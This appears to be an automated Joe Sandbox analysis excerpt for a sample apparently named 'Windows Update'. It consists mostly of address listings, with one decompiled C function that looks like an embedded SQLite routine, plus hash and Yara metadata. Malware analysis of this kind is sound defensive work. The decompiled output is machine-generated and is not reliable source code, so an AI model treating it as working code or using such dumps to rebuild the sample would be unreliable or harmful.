                                                                                                                    0x0004b95b
                                                                                                                    0x0004b95b
                                                                                                                    0x0004b95b
                                                                                                                    0x0004b96b
                                                                                                                    0x0004b971
                                                                                                                    0x0004b976
                                                                                                                    0x0004b97c
                                                                                                                    0x0004b981
                                                                                                                    0x0004ba05
                                                                                                                    0x0004ba05
                                                                                                                    0x0004ba0d
                                                                                                                    0x0004ba10
                                                                                                                    0x0004ba16
                                                                                                                    0x0004ba16
                                                                                                                    0x0004ba1f
                                                                                                                    0x0004ba29
                                                                                                                    0x0004bbe0
                                                                                                                    0x0004bbe4
                                                                                                                    0x0004bcc2
                                                                                                                    0x0004bcc8
                                                                                                                    0x0004bccb
                                                                                                                    0x0004bbea
                                                                                                                    0x0004bbea
                                                                                                                    0x0004bbed
                                                                                                                    0x0004bbef
                                                                                                                    0x0004bbf4
                                                                                                                    0x00000000
                                                                                                                    0x0004bbfa
                                                                                                                    0x0004bbfd
                                                                                                                    0x0004bc07
                                                                                                                    0x0004bc07
                                                                                                                    0x0004bc0b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004bc13
                                                                                                                    0x0004bc14
                                                                                                                    0x0004bc19
                                                                                                                    0x00000000
                                                                                                                    0x0004bc1b
                                                                                                                    0x0004bc21
                                                                                                                    0x0004bc24
                                                                                                                    0x0004bc24
                                                                                                                    0x00000000
                                                                                                                    0x0004bc19
                                                                                                                    0x0004bc67
                                                                                                                    0x0004bc6a
                                                                                                                    0x0004bc6c
                                                                                                                    0x0004bc72
                                                                                                                    0x0004bc72
                                                                                                                    0x0004bc77
                                                                                                                    0x0004bc7d
                                                                                                                    0x0004bc9d
                                                                                                                    0x0004bc9f
                                                                                                                    0x0004bc9f
                                                                                                                    0x0004bca5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004bca7
                                                                                                                    0x0004bcad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004bcad
                                                                                                                    0x0004bc9f
                                                                                                                    0x0004bcaf
                                                                                                                    0x0004bcaf
                                                                                                                    0x0004bcb2
                                                                                                                    0x0004bcb5
                                                                                                                    0x0004bcba
                                                                                                                    0x0004bcbc
                                                                                                                    0x0004bcbc
                                                                                                                    0x0004bcbf
                                                                                                                    0x00000000
                                                                                                                    0x0004bc7f
                                                                                                                    0x0004bc85
                                                                                                                    0x0004bc88
                                                                                                                    0x0004bc8b
                                                                                                                    0x0004bc92
                                                                                                                    0x0004bc95
                                                                                                                    0x0004bc95
                                                                                                                    0x0004bc7d
                                                                                                                    0x0004bbf4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004bd03
                                                                                                                    0x0004bd03
                                                                                                                    0x0004bd08
                                                                                                                    0x0004bd0b
                                                                                                                    0x0004bd11
                                                                                                                    0x0004bd26
                                                                                                                    0x0004b987
                                                                                                                    0x0004b987
                                                                                                                    0x0004b987
                                                                                                                    0x0004b989
                                                                                                                    0x0004b98f
                                                                                                                    0x0004b98f
                                                                                                                    0x0004b997
                                                                                                                    0x0004b997
                                                                                                                    0x0004b99b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b99f
                                                                                                                    0x0004b9b3
                                                                                                                    0x0004b9b3
                                                                                                                    0x0004b9a1
                                                                                                                    0x0004b9a1
                                                                                                                    0x0004b9a7
                                                                                                                    0x00000000
                                                                                                                    0x0004b9a9
                                                                                                                    0x0004b9a9
                                                                                                                    0x0004b9ac
                                                                                                                    0x0004b9b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b9b1
                                                                                                                    0x0004b9a7
                                                                                                                    0x0004b9bc
                                                                                                                    0x0004b9be
                                                                                                                    0x00000000
                                                                                                                    0x0004b9d0
                                                                                                                    0x0004b9d0
                                                                                                                    0x0004b9d6
                                                                                                                    0x0004b9d7
                                                                                                                    0x0004b9fc
                                                                                                                    0x0004b9fc
                                                                                                                    0x0004b9ff
                                                                                                                    0x0004ba02
                                                                                                                    0x0004ba02
                                                                                                                    0x00000000
                                                                                                                    0x0004b9d9
                                                                                                                    0x0004b9e4
                                                                                                                    0x0004b9e7
                                                                                                                    0x0004b9e7
                                                                                                                    0x0004b9eb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b9f6
                                                                                                                    0x0004b9f9
                                                                                                                    0x0004b9fa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b9fa
                                                                                                                    0x0004bb30
                                                                                                                    0x0004bb39
                                                                                                                    0x0004bb44
                                                                                                                    0x0004bb4a
                                                                                                                    0x0004bb67
                                                                                                                    0x0004bb67
                                                                                                                    0x0004b9d7
                                                                                                                    0x00000000
                                                                                                                    0x0004b9be
                                                                                                                    0x0004b9b7
                                                                                                                    0x0004b9b9
                                                                                                                    0x00000000
                                                                                                                    0x0004b9c7
                                                                                                                    0x0004b9c7
                                                                                                                    0x0004b9ca
                                                                                                                    0x00000000
                                                                                                                    0x0004b9ce
                                                                                                                    0x0004b901
                                                                                                                    0x0004b902
                                                                                                                    0x00000000
                                                                                                                    0x0004b907
                                                                                                                    0x0004b8ff
                                                                                                                    0x0004b8c0
                                                                                                                    0x0004b8b5
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: 8bG$@aA
                                                                                                                    • API String ID: 2102423945-2348318730
                                                                                                                    • Opcode ID: 35f34800dfe30e8a64b0424f7a5e03b0dd3ac5f5a7aec775153db741aad45264
                                                                                                                    • Instruction ID: ae0e36d03cc7963c6d9322e780726be7ee9a4b4923f2b1103053c3baf054704e
                                                                                                                    • Opcode Fuzzy Hash: 35f34800dfe30e8a64b0424f7a5e03b0dd3ac5f5a7aec775153db741aad45264
                                                                                                                    • Instruction Fuzzy Hash: C1F1CEB0A002458BDB20DF64C881BAABBF5FF14304F1445BEE8499B352EB75ED45CB99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000E226C Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 358COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 59%
                                                                                                                    			E000E226C(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				intOrPtr _t134;
				signed int _t140;
				signed int _t142;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed short _t149;
				signed int _t151;
				signed int _t158;
				signed int _t161;
				signed int _t170;
				signed int _t177;
				intOrPtr _t178;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t191;
				signed int _t192;
				intOrPtr _t195;
				signed int _t196;
				void* _t197;
				void* _t198;
				void* _t200;
				intOrPtr _t207;

				_t195 = _a4;
				_v12 = 0;
				_t177 = E000D330C(_t195, 0x20c);
				_t198 = _t197 + 8;
				_v32 = _t177;
				if(_t177 == 0) {
					_t185 = 7;
					L79:
					if(_t195 == 0 || _t177 == 0) {
						L84:
						L000ABDBC(_t177);
						_t198 = _t198 + 4;
						goto L85;
					} else {
						_t107 = _t195 + 0xe8; // 0x68d6ff00
						if(_t177 <  *_t107) {
							goto L84;
						}
						_t108 = _t195 + 0xec; // 0x4756c0
						if(_t177 >=  *_t108) {
							goto L84;
						}
						_t109 = _t195 + 0xe4; // 0x4874bca3
						 *_t177 =  *_t109;
						 *((intOrPtr*)(_t195 + 0xdc)) =  *((intOrPtr*)(_t195 + 0xdc)) - 1;
						 *(_t195 + 0xe4) = _t177;
						L85:
						if(_t195 == 0) {
							__eflags = 0xff;
							return 0x000000ff & _t185;
						} else {
							if( *((char*)(_t195 + 0x1e)) != 0 || _t185 == 0xc0a) {
								_push(0);
								_push(7);
								_push(_t195);
								E000D50DC(_t185);
								 *((char*)(_t195 + 0x1e)) = 0;
								_t185 = 7;
							}
							_t115 = _t195 + 0x18; // 0xc35de58b
							return  *_t115 & _t185;
						}
					}
				}
				L000FCE0C(_t177, 0, 0x20c);
				_t186 = 0;
				_t200 = _t198 + 0xc;
				if( *((intOrPtr*)(_t195 + 4)) <= 0) {
					L7:
					_t187 = _a12;
					_t125 = _a8;
					 *_t177 = _t195;
					_t207 = _t187;
					if(_t207 < 0 || _t207 != 0 &&  *((char*)(_t125 + _t187 - 1)) == 0) {
						_t179 =  &_v12;
						E000E399C(_t177, _t125,  &_v12);
						_t200 = _t200 + 0xc;
						goto L21;
					} else {
						_t17 = _t195 + 0x4c; // 0x575ff85
						if(_t187 <=  *_t17) {
							__eflags = _t125;
							if(_t125 == 0) {
								L19:
								 *((intOrPtr*)(_t177 + 0x1dc)) = _t125 + _t187;
								L21:
								__eflags =  *((char*)(_t195 + 0x1e));
								if( *((char*)(_t195 + 0x1e)) != 0) {
									 *(_t177 + 4) = 7;
								}
								__eflags =  *(_t177 + 4) - 0x65;
								if( *(_t177 + 4) == 0x65) {
									 *(_t177 + 4) = 0;
								}
								__eflags =  *((char*)(_t177 + 0x12));
								if(__eflags != 0) {
									_t158 = E000C91FC(_t177, _t195, __eflags, _t195);
									_t200 = _t200 + 4;
									__eflags = _t158;
									if(_t158 == 0) {
										 *(_t177 + 4) = 0x11;
									}
								}
								__eflags =  *(_t177 + 4) - 0x11;
								if( *(_t177 + 4) == 0x11) {
									E000E315C(_t179, _t195, 0);
									_t200 = _t200 + 8;
								}
								__eflags =  *((char*)(_t195 + 0x1e));
								if( *((char*)(_t195 + 0x1e)) != 0) {
									 *(_t177 + 4) = 7;
								}
								_t180 = _a24;
								__eflags = _t180;
								if(_t180 != 0) {
									 *_t180 =  *((intOrPtr*)(_t177 + 0x1dc));
								}
								_t127 =  *(_t177 + 4);
								_v8 = _t127;
								__eflags = _t127;
								if(_t127 != 0) {
									L60:
									__eflags =  *((char*)(_t195 + 0x78));
									if( *((char*)(_t195 + 0x78)) == 0) {
										_t180 = _a8;
										__eflags =  *((intOrPtr*)(_t177 + 0x1dc)) - _a8;
										E000F3BFC( *((intOrPtr*)(_t177 + 0x1dc)) - _a8,  *(_t177 + 0xc), _a8,  *((intOrPtr*)(_t177 + 0x1dc)) - _a8, _a16);
										_t200 = _t200 + 0x10;
									}
									_t188 =  *(_t177 + 0xc);
									__eflags = _t188;
									if(_t188 == 0) {
										L71:
										 *_a20 = _t188;
										goto L72;
									} else {
										__eflags = _v8;
										if(_v8 != 0) {
											L65:
											_t134 =  *((intOrPtr*)(_t188 + 0x44));
											__eflags = _t134 - 0xbdf20da3;
											if(__eflags == 0) {
												L69:
												E000F348C(_t180, __eflags, _t188);
												_t200 = _t200 + 4;
												L70:
												E000EB77C(_t177, _t188);
												_t200 = _t200 + 4;
												L72:
												_t129 = _v12;
												_t185 = _v8;
												__eflags = _t129;
												if(_t129 == 0) {
													_push(0);
													_push(_t185);
													_push(_t195);
													E000D50DC(_t185);
													_t198 = _t200 + 0xc;
													goto L79;
												}
												E000D50DC(_t185, _t195, _t185, 0x47444c, _t129);
												_t181 = _v12;
												_t198 = _t200 + 0x10;
												_t101 = _t195 + 0xe8; // 0x68d6ff00
												__eflags = _t181 -  *_t101;
												if(_t181 <  *_t101) {
													L76:
													L000ABDBC(_t181);
													_t198 = _t198 + 4;
													goto L79;
												}
												_t102 = _t195 + 0xec; // 0x4756c0
												__eflags = _t181 -  *_t102;
												if(_t181 >=  *_t102) {
													goto L76;
												}
												_t103 = _t195 + 0xe4; // 0x4874bca3
												 *_t181 =  *_t103;
												 *((intOrPtr*)(_t195 + 0xdc)) =  *((intOrPtr*)(_t195 + 0xdc)) - 1;
												 *(_t195 + 0xe4) = _t181;
												goto L79;
											}
											__eflags = _t134 - 0x519c2973;
											if(__eflags == 0) {
												goto L69;
											}
											__eflags = _t134 - 0x26bceaa5;
											if(_t134 == 0x26bceaa5) {
												goto L70;
											}
											goto L72;
										}
										__eflags =  *((char*)(_t195 + 0x1e));
										if( *((char*)(_t195 + 0x1e)) == 0) {
											goto L71;
										}
										goto L65;
									}
								} else {
									_t140 =  *(_t177 + 0xc);
									__eflags = _t140;
									if(_t140 == 0) {
										goto L60;
									}
									_t180 =  *((intOrPtr*)(_t177 + 0x1bc));
									__eflags = _t180;
									if(_t180 == 0) {
										goto L60;
									}
									__eflags = _t180 - 2;
									if(_t180 != 2) {
										E000F3B3C(_t140, 8);
										_t200 = _t200 + 8;
										_t142 = 0;
										__eflags = 0;
										_t180 = 8;
									} else {
										E000F3B3C(_t140, 3);
										_t142 = 8;
										_t200 = _t200 + 8;
										_t53 = _t142 + 3; // 0xb
										_t180 = _t53;
									}
									_v24 = _t180;
									_v20 = _t142;
									__eflags = _t142 - _t180;
									if(_t142 < _t180) {
										_t184 = 0;
										__eflags = 0;
										_v16 = 0;
										_t196 = _t142;
										do {
											_t189 =  *(_t177 + 0xc);
											_t180 =  *(0x476004 + _t196 * 4);
											_t143 =  *_t189;
											_v20 = _t180;
											__eflags =  *((char*)(_t143 + 0x1e));
											if( *((char*)(_t143 + 0x1e)) != 0) {
												goto L58;
											}
											_t191 =  *((intOrPtr*)(_t189 + 0x28)) + _t184;
											__eflags = _t180;
											if(_t180 != 0) {
												_t144 =  *(_t191 + 0x10);
												__eflags = _t144;
												if(_t144 == 0) {
													_t145 = 0x3b9aca00;
												} else {
													_t145 =  *(_t144 + 0x48);
												}
												_t178 = 0;
												__eflags = _t145;
												if(_t145 < 0) {
													L53:
													_v28 = 0x202;
													_push(_t191);
													__eflags = 0 - 0x436540;
													if(0 != 0x436540) {
														E000F272C();
														 *(_t191 + 0x14) = _v20;
														_t149 = 0xa02;
													} else {
														E000F272C();
														_t151 = _v20;
														 *(_t191 + 0x14) = _t151;
														 *(_t191 + 0x24) = _t151;
														_t149 = _v28;
													}
													_t184 = _v16;
													 *((intOrPtr*)(_t191 + 0x18)) = _t178;
													_t177 = _v32;
													 *(_t191 + 0x20) = 0;
													_t200 = _t200 + 4;
													 *((short*)(_t191 + 0x1e)) = 0x103;
													L57:
													 *(_t191 + 0x1c) = _t149;
													goto L58;
												} else {
													while(1) {
														__eflags =  *((char*)(_t178 + _t180));
														if( *((char*)(_t178 + _t180)) == 0) {
															goto L53;
														}
														_t178 = _t178 + 1;
														__eflags = _t178 - _t145;
														if(_t178 <= _t145) {
															continue;
														}
														goto L53;
													}
													goto L53;
												}
											}
											__eflags =  *(_t191 + 0x1c) & 0x00000020;
											if(( *(_t191 + 0x1c) & 0x00000020) != 0) {
												E000E378C( *_t191);
												_t184 = _v16;
												_t200 = _t200 + 4;
											}
											_t180 = 0xbf01;
											_t149 =  *(_t191 + 0x1c) & 0x0000bf01 | 0x00000001;
											 *((char*)(_t191 + 0x1e)) = 5;
											goto L57;
											L58:
											_t196 = _t196 + 1;
											_t184 = _t184 + 0x28;
											_v16 = _t184;
											__eflags = _t196 - _v24;
										} while (_t196 < _v24);
										_t195 = _a4;
									}
									goto L60;
								}
							}
							_t25 = _t187 + 1; // 0x575ff86
							_t161 = E000D330C(_t195, _t25);
							_t200 = _t200 + 8;
							_v16 = _t161;
							__eflags = _t161;
							if(_t161 == 0) {
								_t125 = _a8;
								goto L19;
							}
							L000FBECC(_t161, _a8, _t187);
							 *((char*)(_v16 + _t187)) = 0;
							_t192 = _v16;
							E000E399C(_t177, _t192,  &_v12);
							E000D32BC(_t195, _t192);
							_t200 = _t200 + 0x20;
							 *((intOrPtr*)(_t177 + 0x1dc)) =  *((intOrPtr*)(_t177 + 0x1dc)) + _a8 - _t192;
							goto L21;
						}
						_push(0x47b5bc);
						_push(0x12);
						_push(_t195);
						E000D50DC(_t187);
						_t198 = _t200 + 0xc;
						_t170 = 0x12;
						if( *((char*)(_t195 + 0x1e)) != 0) {
							_push(0);
							_push(7);
							_push(_t195);
							E000D50DC(_t187);
							_t198 = _t198 + 0xc;
							 *((char*)(_t195 + 0x1e)) = 0;
							_t170 = 7;
						}
						_t20 = _t195 + 0x18; // 0xc35de58b
						_t185 =  *_t20 & _t170;
						goto L79;
					}
				} else {
					_t182 = 0;
					_v16 = 0;
					do {
						_t6 = _t195 + 8; // 0x8300003b
						_t173 =  *((intOrPtr*)(_t182 +  *_t6 + 4));
						if( *((intOrPtr*)(_t182 +  *_t6 + 4)) == 0) {
							goto L6;
						}
						_t183 = L000D0EDC(_t173);
						_t200 = _t200 + 4;
						_v8 = _t183;
						if(_t183 != 0) {
							_t21 = _t195 + 8; // 0x8300003b
							E000D50DC(_t186 + _t186, _t195, _t183, 0x47b59c,  *((intOrPtr*)( *_t21 + (_t186 + _t186) * 8)));
							_t185 = _v8;
							_t198 = _t200 + 0x10;
							goto L79;
						}
						_t182 = _v16;
						L6:
						_t186 = _t186 + 1;
						_t182 = _t182 + 0x10;
						_v16 = _t182;
						_t12 = _t195 + 4; // 0x76e8ffff
					} while (_t186 <  *_t12);
					goto L7;
				}
			}














































                                                                                                                    0x000e2274
                                                                                                                    0x000e227e
                                                                                                                    0x000e228a
                                                                                                                    0x000e228c
                                                                                                                    0x000e228f
                                                                                                                    0x000e2294
                                                                                                                    0x000e2630
                                                                                                                    0x000e2635
                                                                                                                    0x000e2637
                                                                                                                    0x000e2663
                                                                                                                    0x000e2664
                                                                                                                    0x000e2669
                                                                                                                    0x00000000
                                                                                                                    0x000e263d
                                                                                                                    0x000e263d
                                                                                                                    0x000e2643
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e2645
                                                                                                                    0x000e264b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e264d
                                                                                                                    0x000e2653
                                                                                                                    0x000e2655
                                                                                                                    0x000e265b
                                                                                                                    0x000e266c
                                                                                                                    0x000e266e
                                                                                                                    0x000e26a5
                                                                                                                    0x000e26ad
                                                                                                                    0x000e2670
                                                                                                                    0x000e2674
                                                                                                                    0x000e267e
                                                                                                                    0x000e2680
                                                                                                                    0x000e2682
                                                                                                                    0x000e2683
                                                                                                                    0x000e268b
                                                                                                                    0x000e268f
                                                                                                                    0x000e268f
                                                                                                                    0x000e2694
                                                                                                                    0x000e269f
                                                                                                                    0x000e269f
                                                                                                                    0x000e266e
                                                                                                                    0x000e2637
                                                                                                                    0x000e22a2
                                                                                                                    0x000e22a7
                                                                                                                    0x000e22a9
                                                                                                                    0x000e22af
                                                                                                                    0x000e22e8
                                                                                                                    0x000e22e8
                                                                                                                    0x000e22eb
                                                                                                                    0x000e22ee
                                                                                                                    0x000e22f0
                                                                                                                    0x000e22f2
                                                                                                                    0x000e23bf
                                                                                                                    0x000e23c5
                                                                                                                    0x000e23ca
                                                                                                                    0x00000000
                                                                                                                    0x000e2305
                                                                                                                    0x000e2305
                                                                                                                    0x000e2308
                                                                                                                    0x000e2364
                                                                                                                    0x000e2366
                                                                                                                    0x000e23b5
                                                                                                                    0x000e23b7
                                                                                                                    0x000e23cd
                                                                                                                    0x000e23cd
                                                                                                                    0x000e23d1
                                                                                                                    0x000e23d3
                                                                                                                    0x000e23d3
                                                                                                                    0x000e23da
                                                                                                                    0x000e23de
                                                                                                                    0x000e23e0
                                                                                                                    0x000e23e0
                                                                                                                    0x000e23e7
                                                                                                                    0x000e23eb
                                                                                                                    0x000e23ee
                                                                                                                    0x000e23f3
                                                                                                                    0x000e23f6
                                                                                                                    0x000e23f8
                                                                                                                    0x000e23fa
                                                                                                                    0x000e23fa
                                                                                                                    0x000e23f8
                                                                                                                    0x000e2401
                                                                                                                    0x000e2405
                                                                                                                    0x000e240a
                                                                                                                    0x000e240f
                                                                                                                    0x000e240f
                                                                                                                    0x000e2412
                                                                                                                    0x000e2416
                                                                                                                    0x000e2418
                                                                                                                    0x000e2418
                                                                                                                    0x000e241f
                                                                                                                    0x000e2422
                                                                                                                    0x000e2424
                                                                                                                    0x000e242c
                                                                                                                    0x000e242c
                                                                                                                    0x000e242e
                                                                                                                    0x000e2431
                                                                                                                    0x000e2434
                                                                                                                    0x000e2436
                                                                                                                    0x000e256d
                                                                                                                    0x000e256d
                                                                                                                    0x000e2571
                                                                                                                    0x000e2573
                                                                                                                    0x000e257f
                                                                                                                    0x000e2586
                                                                                                                    0x000e258b
                                                                                                                    0x000e258b
                                                                                                                    0x000e258e
                                                                                                                    0x000e2591
                                                                                                                    0x000e2593
                                                                                                                    0x000e25cf
                                                                                                                    0x000e25d2
                                                                                                                    0x00000000
                                                                                                                    0x000e2595
                                                                                                                    0x000e2595
                                                                                                                    0x000e2599
                                                                                                                    0x000e25a1
                                                                                                                    0x000e25a1
                                                                                                                    0x000e25a4
                                                                                                                    0x000e25a9
                                                                                                                    0x000e25bb
                                                                                                                    0x000e25bc
                                                                                                                    0x000e25c1
                                                                                                                    0x000e25c4
                                                                                                                    0x000e25c5
                                                                                                                    0x000e25ca
                                                                                                                    0x000e25d4
                                                                                                                    0x000e25d4
                                                                                                                    0x000e25d7
                                                                                                                    0x000e25da
                                                                                                                    0x000e25dc
                                                                                                                    0x000e2622
                                                                                                                    0x000e2624
                                                                                                                    0x000e2625
                                                                                                                    0x000e2626
                                                                                                                    0x000e262b
                                                                                                                    0x00000000
                                                                                                                    0x000e262b
                                                                                                                    0x000e25e6
                                                                                                                    0x000e25eb
                                                                                                                    0x000e25ee
                                                                                                                    0x000e25f1
                                                                                                                    0x000e25f1
                                                                                                                    0x000e25f7
                                                                                                                    0x000e2617
                                                                                                                    0x000e2618
                                                                                                                    0x000e261d
                                                                                                                    0x00000000
                                                                                                                    0x000e261d
                                                                                                                    0x000e25f9
                                                                                                                    0x000e25f9
                                                                                                                    0x000e25ff
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e2601
                                                                                                                    0x000e2607
                                                                                                                    0x000e2609
                                                                                                                    0x000e260f
                                                                                                                    0x00000000
                                                                                                                    0x000e260f
                                                                                                                    0x000e25ab
                                                                                                                    0x000e25b0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e25b2
                                                                                                                    0x000e25b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e25b9
                                                                                                                    0x000e259b
                                                                                                                    0x000e259f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e259f
                                                                                                                    0x000e243c
                                                                                                                    0x000e243c
                                                                                                                    0x000e243f
                                                                                                                    0x000e2441
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e2447
                                                                                                                    0x000e244d
                                                                                                                    0x000e244f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e2455
                                                                                                                    0x000e2458
                                                                                                                    0x000e2472
                                                                                                                    0x000e2477
                                                                                                                    0x000e247a
                                                                                                                    0x000e247a
                                                                                                                    0x000e247c
                                                                                                                    0x000e245a
                                                                                                                    0x000e245d
                                                                                                                    0x000e2462
                                                                                                                    0x000e2467
                                                                                                                    0x000e246a
                                                                                                                    0x000e246a
                                                                                                                    0x000e246a
                                                                                                                    0x000e2481
                                                                                                                    0x000e2484
                                                                                                                    0x000e2487
                                                                                                                    0x000e2489
                                                                                                                    0x000e248f
                                                                                                                    0x000e248f
                                                                                                                    0x000e2491
                                                                                                                    0x000e2494
                                                                                                                    0x000e249c
                                                                                                                    0x000e249c
                                                                                                                    0x000e249f
                                                                                                                    0x000e24a6
                                                                                                                    0x000e24a8
                                                                                                                    0x000e24ab
                                                                                                                    0x000e24af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e24b8
                                                                                                                    0x000e24ba
                                                                                                                    0x000e24bc
                                                                                                                    0x000e24e7
                                                                                                                    0x000e24ea
                                                                                                                    0x000e24ec
                                                                                                                    0x000e24f3
                                                                                                                    0x000e24ee
                                                                                                                    0x000e24ee
                                                                                                                    0x000e24ee
                                                                                                                    0x000e24f8
                                                                                                                    0x000e24fa
                                                                                                                    0x000e24fc
                                                                                                                    0x000e2509
                                                                                                                    0x000e250b
                                                                                                                    0x000e2512
                                                                                                                    0x000e2513
                                                                                                                    0x000e2518
                                                                                                                    0x000e252d
                                                                                                                    0x000e2535
                                                                                                                    0x000e2538
                                                                                                                    0x000e251a
                                                                                                                    0x000e251a
                                                                                                                    0x000e251f
                                                                                                                    0x000e2522
                                                                                                                    0x000e2525
                                                                                                                    0x000e2528
                                                                                                                    0x000e2528
                                                                                                                    0x000e253d
                                                                                                                    0x000e2540
                                                                                                                    0x000e2543
                                                                                                                    0x000e2546
                                                                                                                    0x000e254d
                                                                                                                    0x000e2550
                                                                                                                    0x000e2556
                                                                                                                    0x000e2556
                                                                                                                    0x00000000
                                                                                                                    0x000e24fe
                                                                                                                    0x000e24fe
                                                                                                                    0x000e24fe
                                                                                                                    0x000e2502
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e2504
                                                                                                                    0x000e2505
                                                                                                                    0x000e2507
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e2507
                                                                                                                    0x00000000
                                                                                                                    0x000e24fe
                                                                                                                    0x000e24fc
                                                                                                                    0x000e24be
                                                                                                                    0x000e24c2
                                                                                                                    0x000e24c6
                                                                                                                    0x000e24cb
                                                                                                                    0x000e24ce
                                                                                                                    0x000e24ce
                                                                                                                    0x000e24d5
                                                                                                                    0x000e24dd
                                                                                                                    0x000e24e1
                                                                                                                    0x00000000
                                                                                                                    0x000e255a
                                                                                                                    0x000e255a
                                                                                                                    0x000e255b
                                                                                                                    0x000e255e
                                                                                                                    0x000e2561
                                                                                                                    0x000e2561
                                                                                                                    0x000e256a
                                                                                                                    0x000e256a
                                                                                                                    0x00000000
                                                                                                                    0x000e2489
                                                                                                                    0x000e2436
                                                                                                                    0x000e2368
                                                                                                                    0x000e236d
                                                                                                                    0x000e2372
                                                                                                                    0x000e2375
                                                                                                                    0x000e2378
                                                                                                                    0x000e237a
                                                                                                                    0x000e23b2
                                                                                                                    0x00000000
                                                                                                                    0x000e23b2
                                                                                                                    0x000e2381
                                                                                                                    0x000e2389
                                                                                                                    0x000e238d
                                                                                                                    0x000e2396
                                                                                                                    0x000e239d
                                                                                                                    0x000e23a7
                                                                                                                    0x000e23aa
                                                                                                                    0x00000000
                                                                                                                    0x000e23aa
                                                                                                                    0x000e230a
                                                                                                                    0x000e230f
                                                                                                                    0x000e2311
                                                                                                                    0x000e2312
                                                                                                                    0x000e2317
                                                                                                                    0x000e231e
                                                                                                                    0x000e2323
                                                                                                                    0x000e2325
                                                                                                                    0x000e2327
                                                                                                                    0x000e2329
                                                                                                                    0x000e232a
                                                                                                                    0x000e232f
                                                                                                                    0x000e2332
                                                                                                                    0x000e2336
                                                                                                                    0x000e2336
                                                                                                                    0x000e233b
                                                                                                                    0x000e233e
                                                                                                                    0x00000000
                                                                                                                    0x000e233e
                                                                                                                    0x000e22b1
                                                                                                                    0x000e22b1
                                                                                                                    0x000e22b3
                                                                                                                    0x000e22bc
                                                                                                                    0x000e22bc
                                                                                                                    0x000e22bf
                                                                                                                    0x000e22c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000e22cd
                                                                                                                    0x000e22cf
                                                                                                                    0x000e22d2
                                                                                                                    0x000e22d7
                                                                                                                    0x000e2345
                                                                                                                    0x000e2354
                                                                                                                    0x000e2359
                                                                                                                    0x000e235c
                                                                                                                    0x00000000
                                                                                                                    0x000e235c
                                                                                                                    0x000e22d9
                                                                                                                    0x000e22dc
                                                                                                                    0x000e22dc
                                                                                                                    0x000e22dd
                                                                                                                    0x000e22e0
                                                                                                                    0x000e22e3
                                                                                                                    0x000e22e3
                                                                                                                    0x00000000
                                                                                                                    0x000e22bc

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 000E22A2
                                                                                                                    • _memmove.LIBCMT ref: 000E2381
                                                                                                                      • Part of subcall function 000F3B3C: _memset.LIBCMT ref: 000F3BBC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: @eC
                                                                                                                    • API String ID: 2532777613-2021972762
                                                                                                                    • Opcode ID: 7eb748f00a65be4189ce6a5702c696bc42c1b09aab62705d5f830c79dc556e19
